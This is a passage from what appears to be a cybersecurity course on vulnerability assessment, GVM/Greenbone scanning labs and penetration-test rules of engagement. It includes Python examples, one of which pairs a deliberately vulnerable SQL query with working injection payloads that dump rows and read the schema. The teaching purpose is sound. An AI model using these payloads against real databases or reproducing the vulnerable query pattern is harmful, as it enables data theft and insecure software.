• Misconfigured rules for firewalls, intrusion detection systems (IDSs), and other network security applications: Many such applications have a default rule set that can shape traffic to some degree, but this is rarely adequate. A rule set that fails to incorporate the organization's security policies will be unable to do its part in mitigating risk. Misconfigured rules can be both too restrictive and too lax; the former may interrupt availability, and the latter may enable an attacker to slip past the defenses.
• Poorly secured configuration files: In addition to configurations themselves being flawed, the files they are stored in can also be weak against unauthorized reading and modification. If these files aren't properly protected through encryption and access control, an attacker can more easily perform reconnaissance on an application or alter the way it functions.
• Flaws in database software: There are many potential flaws in database software, including flaws in deployment, design, and redundancy measures. One specific vulnerability common to databases that interface with the web is SQL injection. When untrusted input is concatenated into a SQL statement instead of being passed as a bound parameter, an attacker can supply input that changes the statement's structure and, for example, dump the contents of a table or delete entire tables.
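The SQL injection flaw named in the last item, as an added example that is not from this course: the vulnerable lookup splices user input into the SQL text, the safe one passes it as a bound parameter, and two constructed payloads first dump every row and then read the schema table. Table, rows, and payloads are constructed, and SQLite is used only so the example runs without a database server.

```python
"""Added example, not part of the CFR-410 course: the SQL injection flaw
described above, shown as a query built by string formatting next to the
parameterized version that closes the hole. The schema, rows, and
attacker payloads are constructed; SQLite is used so it runs anywhere."""
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT);"
        "INSERT INTO users (username, role) VALUES ('alice', 'admin'), ('bob', 'user');"
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    """Improper input handling: the value is spliced into the SQL text, so a
    quote character in it ends the literal and the rest becomes SQL."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    """Parameterized query: the statement is fixed and the value travels
    separately, so it can only ever be compared as data."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed payloads. The first turns the WHERE clause into a tautology
# and dumps every row; the second appends a UNION that reads the schema
# table, with "--" commenting out the trailing quote the application adds.
TAUTOLOGY_PAYLOAD = "x' OR '1'='1"
SCHEMA_PAYLOAD = "x' UNION SELECT name, sql FROM sqlite_master --"


if __name__ == "__main__":
    db = make_db()
    print("legit:     ", lookup_vulnerable(db, "alice"))
    print("tautology: ", lookup_vulnerable(db, TAUTOLOGY_PAYLOAD))  # every row
    print("schema:    ", lookup_vulnerable(db, SCHEMA_PAYLOAD))     # CREATE TABLE text
    print("safe:      ", lookup_safe(db, TAUTOLOGY_PAYLOAD))        # []
```

The fix is not escaping or filtering quotes but keeping the query text constant and letting the driver bind the value; the same payloads passed to lookup_safe simply match no username.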
Virtual Infrastructure Vulnerabilities

The following is a list of some common vulnerabilities in virtualized hosts and networks:
• Misconfigured virtual machine (VM) hosts and guest images: When VMs are poorly configured for security, they're exposed to many of the same issues as a physical machine. The difference is that VMs are designed to be quickly replicated and provisioned over many instances, so a misconfiguration in just one base image will propagate throughout your infrastructure, resulting in a much larger impact.
• Insecure virtual network appliances: The security capabilities of virtual networking appliances may differ between vendors or configurations. For example, virtual switches in certain modes may not behave fully like physical switches; they may fail to isolate traffic between hosts within a virtual network. An attacker inside one VM may be able to sniff all traffic from another VM on the same virtual switch.
• Improperly secured management interface: If an attacker gains unauthorized access to the VM management interface, they can essentially take full control of all attached virtual systems. The management interface may be on the physical host that runs the VMs, or it may be a centralized platform that oversees VMs from multiple physical hosts. In either case, it is vulnerable to compromise.
• Improper management of physical resources: VMs and virtual networks rely on their physical hosts for processing. If more resources are provisioned to VMs than their physical hosts can handle, the virtual infrastructure will suffer disruptions. This directly impacts the availability of systems used by customers and internal personnel alike.
• Insecure VM hypervisors: Attackers inside a VM can escape from that VM through flaws in its hypervisor. This can enable attackers to access the host hardware and have total control over any virtual environment running on that host.
• Poor change control and patch management processes: If a security fix needs to be applied to a physical host, especially a fix updating the hypervisor, this can cause disruptions for the virtual environments it runs. In addition, the virtual instances themselves will need to be patched from time to time; if no process is in place to manage these changes, it can be difficult to ensure that all instances receive the fix as quickly as possible with minimal interruption.
• Lost system logs: VM instances are most useful when they are elastic, meaning they are optimized to spin up when needed and then power down when not. This process of constant provisioning and deprovisioning means any logs stored on the instances themselves may be lost. This makes the tasks of analyzing user and system behavior and performing after-incident forensics much more difficult for security personnel.

Vulnerability Scans

When a company tests a computer system or network, it is generally testing a production network that is live; security tests are rarely conducted on offline or test networks. A vulnerability scan uses various tools and security utilities to identify and quantify vulnerabilities within a system, such as missing security controls and common misconfigurations, but it does not actually exploit those weaknesses or otherwise directly test the security features of that system.

In a vulnerability scan, information may be collected in a number of ways:
• Active scanning: Interacting with the target directly, for example by probing it over the network or reading a device's configuration.
• Passive assessment: Analyzing indirect evidence resulting from a certain configuration, such as the types of traffic a device generates or how it behaves.
• Through agents installed on the system, or through server-based scanning mechanisms.

Vulnerability scanners can be configured to collect information in different ways based on the criteria you provide. For example, you may wish to widen the scope of a scan to see more potential issues, or narrow the scope to quickly identify problems you already suspect are present. You can also configure scanning tools to scan only certain types of data, or only data that meets a specific sensitivity level as classified by the organization. By default, most scanning tools are hooked into the vendor's vulnerability feed or some other common vulnerability database. If you've determined your own scanning criteria, you may be able to change the feed the tool uses, which alters what the scan actually detects.

Note: Consider having students start keying the activity first, and then present the content in this topic. This will help you avoid any down time in class. Also consider running the scan on your computer beforehand so students can see results right away.

Credentialed vs. Non-Credentialed

Vulnerability scans may be credentialed, meaning they log in to the target with valid credentials to ascertain vulnerabilities at the highest privilege levels (installed packages, local configuration, registry and file permissions). Or, they may be non-credentialed, meaning they run without credentials and see only what an unauthenticated attacker on the network would see. Although you will usually discover more weaknesses with a credentialed scan, you sometimes will want to narrow your focus to think like an attacker who doesn't have specific high-level permissions or total administrative access. A non-credentialed scan can also save time and resources, both of which may be more costly in a credentialed scan; the trade-off is that it must infer patch levels from banners and behavior, which produces more false positives and false negatives.

SCAP

Many popular vulnerability scanners are validated with respect to the Security Content Automation Protocol (SCAP), a specification maintained by the National Institute of Standards and Technology (NIST) that automates the vulnerability management process, including identifying flaws in security configurations. SCAP ties together existing standards such as CVE (vulnerability identifiers), CVSS (severity scoring), CPE (platform naming), XCCDF (checklists), and OVAL (the machine-readable checks themselves). A SCAP-validated tool adheres to standards for scanning processes, results reporting and scoring, and vulnerability prioritization. SCAP is commonly used to uphold internal and external compliance requirements. Some tools that are not officially SCAP-validated have plug-ins that can still export scan data to a SCAP-compliant format.

Specific Vulnerability Scanning Tools

Many vulnerability scanning tools are available commercially. Some are considered "targeted" vulnerability scanners in that they are intended to scan specific platforms or discover specific types of vulnerabilities. Others are general vulnerability scanners that apply to many platforms and look for a broad set of flaws.
• Tenable Nessus® is a comprehensive vulnerability scanner that provides high-speed discovery, configuration auditing, asset profiling, sensitive data discovery, and vulnerability analysis. Although a limited edition is free of charge for personal use in a non-enterprise environment, enterprise organizations must purchase a subscription to use Nessus. For more information, see https://www.tenable.com.
• The System Administrator's Integrated Network Tool (SAINT®) vulnerability scanner screens every live system on a network for TCP and UDP services. For each service it finds running, it launches a set of probes designed to detect anything that could enable an attacker to gain unauthorized access, create a DoS condition, or gain sensitive information about the network. For more information, see https://www.carson-saint.com/.
• The Qualys® Vulnerability Management tool is an assessment and scanning suite that provides continuous monitoring services and a cloud-based management platform. It also integrates compliance requirements into the monitoring and scanning process. For more information, see https://www.qualys.com.
• Rapid7 Nexpose is a vulnerability scanner that generates contextual risk-based scores and reports for vulnerabilities on a wide variety of enterprise software and hardware platforms. It also offers continuous monitoring capabilities. For more information, see https://www.rapid7.com.
• The GFI® LanGuard™ scanner can check networks and ports to detect, assess, and correct security vulnerabilities, including standard vulnerability issues, patch management, and network auditing. For more information, see https://www.gfi.com.
Additionally, a number of free vulnerability scanning tools are available, including:
• The Greenbone Vulnerability Management (GVM) platform is an open source vulnerability assessment and scanning framework. It incorporates a regularly updated database of Network Vulnerability Tests (NVTs) to identify and categorize the latest known vulnerabilities. The framework was previously known as OpenVAS; that name now refers to its scanner component. For more information, see https://www.greenbone.net/en/.
• Nikto2 is an open source tool that targets web server vulnerabilities. It quickly scans a server for potentially dangerous files and programs, common security misconfigurations, and outdated server software. For more information, see https://cirt.net/Nikto2.

ACAS

The Assured Compliance Assessment Solution (ACAS) is a suite, built on Tenable products including Nessus, that integrates various vulnerability assessment tools into a single solution validated by the Defense Information Systems Agency (DISA), a component of the U.S. Department of Defense (DoD). ACAS enables the DoD and its customers to meet the strict DISA compliance standards.
Vulnerability Report Analysis

In many cases, the results of a vulnerability scan won't be simple and straightforward. You shouldn't expect there to be a single button on the report that says "fix all problems" and for it to actually work as advertised. Instead, you'll need to use careful judgment and your experience with cybersecurity to analyze reports and get to the heart of each issue. Being able to draw out the facts behind the report is a crucial skill that all security analysts must possess.

One major component of this skill is being able to identify false positives. Like any automated system, vulnerability scanners do not have perfect insight into your organization's environment, nor can they make context-based decisions at the same level as a human analyst. So, you need to truly understand each vulnerability the scanner presents to you, and then consider how that vulnerability exists in your environment. This will enable you to see any discrepancies between the general vulnerability definition and how that definition may manifest in your systems. For example, a vulnerability scanner may be correct in pointing out that your web server is missing a particular security patch. But you may have fixed the underlying issue through a different mechanism the scanner isn't detecting, such as a vendor backport or a mitigating configuration change; once you have confirmed that on the host itself, the alert is a false positive.

Another important part of your report analysis skillset is the ability to identify exceptions. In some cases, you'll have chosen to accept or transfer the risk of a specific vulnerability because it fits within your risk appetite to do so. Nevertheless, the scanner may still produce this vulnerability in its report. You can therefore mark this particular item as an exception so it won't contribute to your remediation plan. For example, a scanner may tell you that port 80 is open on your web server. This is certainly a common vector of attack, but the port must remain open so the system can fulfill its function.

Once you've identified the nature of the vulnerability alerts and their validity, you'll need to determine how to prioritize your response and remediation actions. Using your pre-existing baselines and risk analysis efforts, you'll be able to decide which vulnerabilities are the most critical versus which are the least critical. Scanner reports often give their best guess by scoring each vulnerability item (usually a CVSS base score), but this typically doesn't take into account the contextual factors unique to your environment, such as the value of the asset, its exposure, and whether compensating controls exist.
Results Validation and Correlation

In addition to identifying the nature of vulnerabilities detected during a scan, you need to support your overall vulnerability management program by validating the results and correlating what you've learned with other data points in your organization. After all, the success of your risk mitigation efforts depends heavily on the accuracy of the vulnerability information you've collected. You need to be able to reconcile the results of a scan with what you know about your environment, as well as what you know about the current security landscape. Not only can this help you validate your current situation, but you can also use this information to identify vulnerability trends that form over time.

Your organization will most likely be driven by a security policy. You can compare the results of a scan with this policy to determine whether a particular vulnerability constitutes a compliance violation. Likewise, you probably operate under a large set of best practices recommended by the security industry, even if those best practices aren't necessarily set in policy. By comparing your scan results to these practices, you can obtain a clearer picture of how a vulnerability does or does not violate a security principle. In either case, comparing results to existing guidelines or policies will help you validate whether a particular system in your environment is actually susceptible to exploitation.

Correlating the scan results with other data sources, like related system and network logs, can also enhance the validation process. As an example, assume that your vulnerability scanner identified a running process on a Windows machine. According to the scanner, the application that creates this process is known to be unstable, causing the operating system to lock up and crash other processes and services. When you search the computer's event logs, you notice that several entries over the past couple of weeks indicate the process has failed. Additional entries show a few other processes failing right after. In this instance, you've used a relevant data source to help confirm that the vulnerability alert is, in fact, valid.
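The report analysis and correlation steps in the two sections above, as an added example that is not from this course: a simplified GVM/OpenVAS-style XML result list is parsed, accepted-risk items (the open port 80 case) are marked as exceptions, the remaining findings are ordered by scanner severity scaled with an asset weight from the risk analysis, and the "unstable process" finding is checked against Windows Application log entries. The report, exception register, asset weights, and log lines are all constructed, and the XML layout is an assumption that mirrors only the fields this example needs; a real GVM report carries many more.

```python
"""Added example, not part of the CFR-410 course: reading a scanner's XML
report, marking accepted-risk exceptions, prioritizing by severity and
asset weight, and correlating one finding with host event log entries.
The report layout is a simplified stand-in for a GVM/OpenVAS result list,
and the report, exception register, weights and log lines are constructed."""
import xml.etree.ElementTree as ET
from typing import Dict, Iterable, List, Set, Tuple

REPORT_XML = """<report>
<results>
<result id="1"><host>10.0.0.5</host><port>80/tcp</port><threat>Low</threat>
<severity>2.6</severity><name>HTTP port open</name></result>
<result id="2"><host>10.0.0.5</host><port>80/tcp</port><threat>High</threat>
<severity>7.5</severity><name>Apache HTTP Server missing security update</name></result>
<result id="3"><host>10.0.0.9</host><port>general/tcp</port><threat>Medium</threat>
<severity>5.0</severity><name>Unstable process legacyagent.exe detected</name></result>
<result id="4"><host>10.0.0.9</host><port>445/tcp</port><threat>Critical</threat>
<severity>9.8</severity><name>SMBv1 enabled</name></result>
</results>
</report>"""

# Constructed risk register: (host, port, finding name) of accepted risks,
# here the web server's port 80, which must stay open.
EXCEPTIONS: Set[Tuple[str, str, str]] = {("10.0.0.5", "80/tcp", "HTTP port open")}
# Constructed asset weights from the risk analysis (1.0 = ordinary host).
ASSET_WEIGHT: Dict[str, float] = {"10.0.0.5": 1.5, "10.0.0.9": 1.0}

# Constructed Windows Application log lines; Event ID 1000 is Application
# Error, which records the faulting executable's name.
EVENT_LOG = [
    "2023-04-01T09:12:03 EventID=1000 Faulting application name: legacyagent.exe",
    "2023-04-01T09:12:04 EventID=1000 Faulting application name: spoolsv.exe",
    "2023-04-03T14:02:11 EventID=1000 Faulting application name: legacyagent.exe",
    "2023-04-05T08:30:00 EventID=7036 The Print Spooler service entered the stopped state.",
]


def parse_report(xml_text: str) -> List[Dict]:
    """Flatten each <result> into a dict with a numeric severity. For reports
    from sources you do not control, parse with defusedxml instead."""
    root = ET.fromstring(xml_text)
    findings = []
    for r in root.iter("result"):
        findings.append({
            "id": r.get("id"),
            "host": r.findtext("host", ""),
            "port": r.findtext("port", ""),
            "threat": r.findtext("threat", ""),
            "severity": float(r.findtext("severity", "0")),
            "name": r.findtext("name", ""),
            "status": "open",
        })
    return findings


def apply_exceptions(findings: List[Dict], exceptions: Set[Tuple[str, str, str]]) -> List[Dict]:
    """Mark accepted or transferred risks so they drop out of remediation
    but stay visible in the report for audit."""
    for f in findings:
        if (f["host"], f["port"], f["name"]) in exceptions:
            f["status"] = "exception"
    return findings


def prioritize(findings: List[Dict], weights: Dict[str, float]) -> List[Dict]:
    """Order open findings by scanner severity scaled by what the asset is
    worth to you; the scanner's score alone knows nothing about that."""
    open_items = [f for f in findings if f["status"] == "open"]
    for f in open_items:
        f["priority"] = round(f["severity"] * weights.get(f["host"], 1.0), 2)
    return sorted(open_items, key=lambda f: f["priority"], reverse=True)


def correlate_crashes(process: str, log_lines: Iterable[str]) -> int:
    """Count Application Error events for a process: evidence from the host
    itself that backs up (or contradicts) an 'unstable process' finding."""
    needle = f"Faulting application name: {process}"
    return sum(1 for line in log_lines if "EventID=1000" in line and needle in line)


if __name__ == "__main__":
    items = apply_exceptions(parse_report(REPORT_XML), EXCEPTIONS)
    for f in prioritize(items, ASSET_WEIGHT):
        print(f["priority"], f["host"], f["port"], f["name"])
    print("legacyagent.exe crashes in log:", correlate_crashes("legacyagent.exe", EVENT_LOG))
```

The weighting moves the web server's missing patch ahead of the higher-scored SMBv1 finding on a less important host, which is the kind of context the scanner's own score cannot supply; the two crash events for legacyagent.exe are the log evidence that validates the third finding before it goes on the remediation list.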

Guidelines for Assessing Vulnerabilities

Use the following guidelines when assessing vulnerabilities.

Assess Vulnerabilities

When assessing vulnerabilities:
• Decide between a penetration test and a vulnerability assessment based on your business needs.
• Follow an assessment process from collecting data through reporting on results.
• Conduct assessments after certain key events, like an update to critical systems or after a new vulnerability is discovered.
• Capture baselines of systems before you begin the assessment in earnest.
• Compare future assessments against these baselines.
• Select the proper assessment tool for the job and consider implementing multiple tools to gain a broader perspective.
• Implement port scanning and fingerprinting to identify basic network-related weaknesses in hosts.
• Familiarize yourself with common vulnerabilities in networks, hosts, and applications.
• Configure vulnerability scan characteristics, including scope, data feeds, sensitivity level, and credentialed vs. non-credentialed, according to business needs.
• Familiarize yourself with the different vulnerability scanners available.
• Choose one or more scanners that best fit the needs of your vulnerability management program.
• Identify any false positives in vulnerability scan results.
• Create exceptions for certain items in a vulnerability scan, when necessary.
• Use existing baselines and risk analysis to prioritize your response to detected vulnerabilities.
• Reconcile scan results with what you know about your environment, and what you know about the security landscape.
• Compare scan results to compliance policy and industry best practices.
• Correlate scan results with other data for validation.

ACTIVITY 6-3
Conducting Vulnerability Scans

Data File
/home/kali/vuln_report.xml

Before You Begin
You'll be using your Kali Linux VM in this activity. You'll also be using the Greenbone Security Assistant (GSA), a vulnerability scanning platform and web interface that runs on the Greenbone Vulnerability Management (GVM) scanning engine, formerly known as OpenVAS.

Instructor note: The data file is a saved report of a successful scan. If students' scans fail or don't produce useful results, they can import this file into GSA and review it instead. To import the saved report, select Scans→Reports and then the Upload report button. Browse for the report file, then create a new container task to add it to. Then, select Import.

Scenario
Now that you have your vulnerability management plan in place, you'll want to initiate a comprehensive vulnerability scan of your systems. You will begin by deploying Greenbone Security Assistant. Using GSA, you'll run a preliminary scan on your Windows Server® 2019 system to detect any immediate issues that may conflict with your risk management strategy.

1. Start the GVM container.
a) Open a terminal in Kali Linux and enter docker start gvm
The GVM service and its GSA interface are both running in a Docker container.
b) Enter docker logs -f --tail=5 gvm
This will show the progress of the GVM service as it initializes by continually printing log entries to the terminal as they are written. It may take a few minutes for the GVM service to fully initialize and be ready for use, so you'll use these logs to identify when it's ready.
Note: If the command terminates and stops showing the log file, run it again. You can also ignore any permissions errors written to the log.
c) When the log indicates the OSPd OpenVAS service is starting, press Ctrl+C to exit the log file.

2. Log in to the GSA web interface.
a) From the top panel, select the Firefox ESR icon to open the web browser.
Instructor note: If students are curious, ESR stands for Extended Support Release: a version that receives security fixes for an extended period but picks up new features less frequently than the standard release.
b) Navigate to https://127.0.0.1:8080

c) You are prompted that the certificate is invalid. Select Advanced, and then select Accept the Risk and Continue.
Note: In a production environment, you would give GSA a valid web certificate to use. Accepting an unknown certificate is only reasonable here because the service is bound to the loopback address of your own VM.
d) At the login page, enter admin as the user name and Pa22w0rd as the password, and then select Sign In.
e) Verify you are taken to the GSA dashboard.

3. Create a new scan task.
a) From the menu, select Scans→Tasks.
b) From the top-left of the page, select the New Task option.
c) In the New Task dialog box, in the Name text box, type Server Scan
d) Next to the Scan Targets drop-down list, select the Create a new target button.
e) In the New Target dialog box, in the Name text box, type Server

f) In the Hosts section, next to the Manual radio button, type the IP address of your Windows Server machine.
g) Select Save.
h) Back in the New Task dialog box, verify that Server is listed in the Scan Targets drop-down list.
i) Select Save.

4. Start the scan.
a) Verify that your Server Scan task is listed. Select the link to open more details about the task.
b) From the controls to the right of the scan name, select the Start button.
c) Verify that the Status of the task changes to Requested.
d) Wait for the Status to change to a percentage, indicating the scan has begun.
e) Wait for the scan to complete.
If the scan runs properly, it will take several minutes to run. If the status doesn't change from Requested to a percentage after a few minutes, you may need to create a new task and start it. It may also take a minute or so for the scan to go above 0%, though it should go faster after that.

Instructor note: If you prefer, rather than waiting for the scan to finish, you can have students select the scan report while it's running to see live results, or open the provided report file. Consider taking a break and letting the scan run.

5. Examine the results of the scan.

a) When the Status changes to Done, select the number 1 next to Reports.
b) Observe the scanner results. The graph shows the number of vulnerabilities detected, categorized by severity color.
c) Select the link under the Date column.
d) Select the Results tab to get a list of the identified vulnerabilities.
e) Select the link to a particular vulnerability to get more information on its impact and any suggested remediation.

Instructor note: Discuss some of these vulnerabilities with students. Do they think these vulnerabilities need to be addressed, or are some of them false positives? How could students remediate these vulnerabilities?

6. When you fix the major vulnerabilities in a system, how can you ensure they are repaired?
A: Rerun the GSA scan against the same target with the same scan configuration and credentials, then compare the new report with the earlier one to see whether the vulnerabilities persist.

7. Why would you not always be able to fix a vulnerability that GSA marks as critical?
A: Answers may vary, but some vulnerabilities require software patching to fix them, and the organization may not be able to update certain software. Some services may also be marked as critical vulnerabilities by GSA, but must be enabled on the host for a variety of reasons.

8. What kind of vulnerability is GSA unable to find?
A: Answers may vary, but GSA cannot discover policy or social engineering vulnerabilities.

9. How can a vulnerability scan like this be useful to a penetration test?
A: Answers may vary, but being able to identify general weak points in an organization can help a penetration tester focus their efforts on systems most likely to be insecure. The penetration tester can actively exploit the vulnerabilities identified by GSA, demonstrating the impact of an attack if it is not prevented.

10. Stop GVM and its container.
a) Close Firefox.
b) At a terminal, enter docker stop gvm
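The guidelines earlier in this topic call for comparing each assessment against a baseline and for documenting exceptions, and question 6 answers that a rerun scan shows whether a fix took. The following Python script is an added example, not part of this course and not Greenbone's code: it parses two GVM-style XML reports and buckets the findings into fixed, persisting, new, excepted, and low-confidence. The XML layout is a constructed, simplified sample modelled on GVM's report format (a <result> with <host>, <port>, <nvt oid>, <threat>, <severity>, and <qod>); the host address, NVT OIDs, and finding names are placeholders. GVM's Quality of Detection (QoD) value is used as a false-positive filter, matching the min_qod=70 in GSA's default result filter, and accepted-risk exceptions are modelled as a plain set of keys where GVM would use overrides.

```python
# Added example (not from the CFR course): compare a baseline GVM/OpenVAS
# report against a rescan to confirm which findings were really fixed.
# The XML below is a constructed, simplified sample modelled on the GVM
# report layout; the OIDs, host and finding names are placeholders.
import xml.etree.ElementTree as ET
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    port: str
    oid: str         # NVT object identifier: the stable key for one check
    name: str
    threat: str      # Log / Low / Medium / High
    severity: float  # CVSS base score as reported by the scanner
    qod: int         # Quality of Detection, 0-100

    @property
    def key(self):
        return (self.host, self.port, self.oid)


def parse_report(xml_text):
    """Return {(host, port, oid): Finding} for every <result> in a report."""
    findings = {}
    for r in ET.fromstring(xml_text).iter("result"):   # depth-independent
        nvt = r.find("nvt")
        f = Finding(
            host=(r.findtext("host") or "").strip(),
            port=(r.findtext("port") or "general/tcp").strip(),
            oid=nvt.get("oid", "") if nvt is not None else "",
            name=((nvt.findtext("name") if nvt is not None else "") or "").strip(),
            threat=(r.findtext("threat") or "Log").strip(),
            severity=float(r.findtext("severity") or 0),
            qod=int(r.findtext("qod/value") or 0),
        )
        findings[f.key] = f
    return findings


def diff_reports(baseline, rescan, exceptions=frozenset(), min_qod=70):
    """Bucket rescan findings relative to the baseline.
    exceptions: (host, port, oid) keys with a documented risk acceptance.
    min_qod:    findings below this QoD are probable false positives and go
                to 'low_confidence' instead of the remediation queue.
    """
    out = {"fixed": [], "persisting": [], "new": [],
           "excepted": [], "low_confidence": []}
    out["fixed"] = [f for k, f in baseline.items() if k not in rescan]
    for k, f in rescan.items():
        if k in exceptions:
            out["excepted"].append(f)
        elif f.qod < min_qod:
            out["low_confidence"].append(f)
        elif k in baseline:
            out["persisting"].append(f)
        else:
            out["new"].append(f)
    for bucket in out.values():                 # highest severity first
        bucket.sort(key=lambda x: x.severity, reverse=True)
    return out


def _result(host, port, oid, name, threat, sev, qod):
    """Build one constructed <result> element in the simplified layout."""
    return (f"<result><host>{host}</host><port>{port}</port>"
            f'<nvt oid="{oid}"><name>{name}</name></nvt>'
            f"<threat>{threat}</threat><severity>{sev}</severity>"
            f"<qod><value>{qod}</value></qod></result>")


H = "10.0.0.20"   # constructed address standing in for the Windows Server
BASELINE_XML = "<report><results>" + "".join([
    _result(H, "445/tcp",     "oid-smb-signing", "SMB signing not required",   "Medium", 5.3, 80),
    _result(H, "3389/tcp",    "oid-rdp-tls",     "RDP weak TLS configuration", "High",   7.5, 70),
    _result(H, "general/tcp", "oid-missing-kb",  "Missing security update",    "High",   9.8, 97),
]) + "</results></report>"
RESCAN_XML = "<report><results>" + "".join([
    _result(H, "445/tcp",  "oid-smb-signing", "SMB signing not required",    "Medium", 5.3, 80),
    _result(H, "5985/tcp", "oid-winrm-http",  "WinRM over HTTP enabled",     "Medium", 5.0, 80),
    _result(H, "135/tcp",  "oid-dcerpc-enum", "DCE/RPC services enumerable", "Low",    2.1, 80),
    _result(H, "80/tcp",   "oid-http-trace",  "HTTP TRACE method enabled",   "Low",    2.6, 30),
]) + "</results></report>"
ACCEPTED_RISKS = {(H, "5985/tcp", "oid-winrm-http")}   # constructed, approved exception

if __name__ == "__main__":
    d = diff_reports(parse_report(BASELINE_XML), parse_report(RESCAN_XML),
                     exceptions=ACCEPTED_RISKS)
    for bucket, items in d.items():
        print(bucket.upper())
        for f in items:
            print(f"  {f.severity:>4} {f.threat:<6} {f.host}:{f.port}  {f.name}")
```

To use it on real data, replace the two inline strings with the contents of two reports exported from GSA (Scans→Reports, export as XML). A real export nests the findings under report/report/results and carries many more fields per result, but iter("result") still finds them. Keying on (host, port, OID) rather than on the finding name is deliberate: the same NVT can fire on several ports of one host, and a name change in the feed should not make an old finding look new.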


TOPIC D
Conduct Penetration Testing
You have identified possible vulnerabilities within your organization's systems. Now you will
conduct penetration testing as part of the process to assess your organization's security posture.

Rules of Engagement (ROE)

Scope is an integral part of your overall pen testing rules of engagement (ROE). The ROE defines how a pen test will be executed, and what constraints will be in place. This provides the pen tester with guidelines to consult as they conduct their tests, without having to constantly ask management for permission to do something. It is crucial that a pen tester does not exceed their mandate under the ROE. Testers must use only those tools and techniques named in the contract, or they could face not only dismissal from the engagement, but also criminal charges.

Although each organization may construct their ROE differently, typical components in an ROE are as follows.

ROE Component    Description

Introduction    This component defines the purpose of the test, the scope of the test, any additional constraints to observe during the test, and the risks associated with the test.

Logistics    This component identifies how the test will be carried out and by whom. Here you should list the contact information and roles of each tester. You also need to define the schedule of the test, where the test will physically take place, and what tools you will be using in the test.

Communication    This component outlines how communication will take place, including who will be notified of certain events, how to notify them, and when. You should also plan for communication with a cybersecurity incident response team (CSIRT) should a major incident occur as a result of the test.

Targets    This component involves identifying exactly which systems and personnel will be targeted by the penetration test, including specific information about the function, purpose, and network address of each asset.

Execution    This component enables you to create a more in-depth outline of each specific test you plan on conducting, both technical and non-technical. This is where you should go into as much detail as you can to avoid any ambiguity.

Reporting    This component enables you to define how you will deliver the results of your tests, the frequency of these reports, and to whom you will be reporting.

Signatures    You must have proof that management (generally a Chief Information Security Officer [CISO], Chief Information Officer [CIO], or equivalent) has authorized your penetration test and agrees to all your terms defined previously. Signing the document also ensures a measure of non-repudiation should something go wrong. It is not enough that just anyone signs off on the pen test; you must be able to prove that people with the proper authority have signed off on it. That authority also has to cover every asset in scope: a signer who does not actually control a building, a network segment, or a hosted system cannot authorize testing against it.

Instructor note: Consider mentioning the example of pen testing company Coalfire, whose employees physically broke into a courthouse in Iowa as part of a pen test. Even though state officials authorized the test, the local county arrested the employees. The county downgraded the charges from burglary to trespassing, but did not immediately drop the charges. Only later were the charges dropped entirely. The following article discusses the Coalfire incident: https://www.zdnet.com/article/charges-dropped-against-penetration-testers-who-broke-into-courthouse/.


Pen Test Teams

As part of the ROE, organizations will occasionally divide their pen testing exercises into different color-coded teams, especially for training purposes:
• The white team consists of the personnel who define the ROE and have decision-making power over the exercise; in other words, they officiate the test. Security and IT managers are usually members of the white team. Although they do not conduct the tests, white team members must still take an active interest in the exercise, as they are responsible for ensuring the test is bringing value to the business. They're often asked to report on the results of the pen test after it has concluded.
• The red team consists of security professionals who are asked to conduct authorized attacks on the organization. The term "red team" is also used to refer to penetration testers in general, if no other teams are defined.
• The blue team consists of security professionals who are asked to defend the organization against the authorized attacks in a penetration test. The term "blue team" is also used to refer to general network defense and incident response personnel in a real-world context, rather than just for pen tests.

Third-Party Penetration Tests

Occasionally, you'll need to work with a third party who will conduct penetration tests on your systems rather than doing these tests in-house. The advantage of relying on a third party comes from the fact that some attacks will be external and unpredictable, which is not necessarily something you can replicate yourself. However, it may be your responsibility to keep this third party grounded and following a strict ROE. In this case, you should ask yourself a few key questions:
• Has the third party agreed to a well-defined scope with the relevant constraints?
• Does the third party carefully document their approach to pen testing?
• Is there a third-party representative I can contact in case of an emergency?
• Does the third party carry liability insurance?
• Does the third party provide the credentials and professional experience of all their personnel?
• Does the third party keep track of all their testing actions in a log that can be analyzed?
• Can the third party provide well-written reports at the end of the test?

Pen Test Frameworks

There are frameworks that guide penetration testing, some of which target specific industries or systems. The CHECK scheme, for example, was established by the UK Communications-Electronics Security Group (CESG), now part of the National Cyber Security Centre (NCSC), to ensure government agencies can identify vulnerabilities to their confidentiality, integrity, and availability through testing of networks and other systems. The Open Web Application Security Project (OWASP) provides knowledge to the software development community for several different security practices, including pen testing, through publications such as the OWASP Testing Guide.
However, a de facto approach to penetration testing is outlined in the Open Source Security Testing Methodology Manual (OSSTMM), maintained by ISECOM, which has a primary goal of providing transparency. The OSSTMM outlines every area of an organization that needs testing, as well as going into detail about how to conduct the relevant tests.
Although your organization may choose to follow OSSTMM, there are other standards and frameworks available in the field of penetration testing. The Penetration Testing Execution Standard (PTES) was established in 2009 by industry experts to cover seven phases of a penetration test, starting with pre-engagement interactions and ending with reporting. The PTES also comes with an in-depth technical guide to supplement the main standard.
Another framework is CBEST, a threat-led testing framework for the UK financial sector run by the Bank of England and delivered through providers accredited by CREST, the Council of Registered Ethical Security Testers. CBEST relies heavily on threat intelligence and focuses on persistent threats.


Another scheme for the certification of pen testers to ensure an appropriate level of skill is the Tigerscheme, which is run and managed by the University of South Wales Commercial Services. It provides a way for skills and experience to be formally recognized. Skills assessments leading to certification are rigorous, and are based upon academic standards. It does not apply a theory-only approach, other than at the entry level, but instead focuses on the successful demonstration of applied knowledge.
Note: Before you undertake any penetration testing, make sure you obtain documented legal authorization from the system's owner or legal custodian to conduct the test.

Common Pen Test Phases

The basic phases of a penetration test remain the same for most frameworks:
1. Reconnaissance
The tester must gather as much information as possible about the target organization and its systems. This is done before the actual attack and involves passive intelligence gathering tactics.
2. Scanning
The tester will begin actively scanning the systems they have identified in the first phase to enumerate those systems. This gives the tester a more complete picture of the target.
3. Exploitation
This is where the tester begins their attack, targeting whatever vulnerabilities they have identified in the previous phases.
4. Maintaining access
